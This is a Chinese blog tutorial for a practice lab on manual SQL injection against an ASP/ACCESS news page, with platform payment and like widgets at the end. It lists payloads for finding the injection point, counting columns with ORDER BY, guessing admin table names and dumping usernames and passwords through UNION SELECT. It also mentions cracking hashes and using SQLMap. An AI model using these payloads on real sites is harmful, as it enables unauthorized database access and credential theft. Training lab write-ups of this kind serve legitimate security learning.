ACCESS手工注入靶场

步骤一:打开网页判断是否存在注入

判断注入点

news_view.asp?id=14' //报错

news_view.asp?id=14 and 1=1  //成功

news_view.asp?id=14 and 1=2  //报错

步骤二:判断当前数据库的字段文件...其到达8时页面置空,说明语句执行失败,当前数据库的字段
仅有7列

?id=14 order by 1

?id=14 order by 7

?id=14 order by 8

步骤三:判断回显的字段及猜测表名称在2与3位置可发现存在字段回显

表名可能有:admin, admins, admin_user, admin_usr ,admin_msg admin_login user username manager, administrator各种大小写变体

步骤四:猜解字段名在2与3位置上查询字段名这里只能考查不能考猜

union select 1,user_name,password,4,5,6,7 from administrator

步骤五:将获取的加密值解密

使用御剑查一下网站管理系统,第二个就是我们所需要的网站

双击这个打开,我们就可以知道管理系统的信息了

步骤六:ACCESS数据库注入过程基本靠猜..当然SQLMapYYDS;其下是整个显错注入流程使用到的语句…

  • 12
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值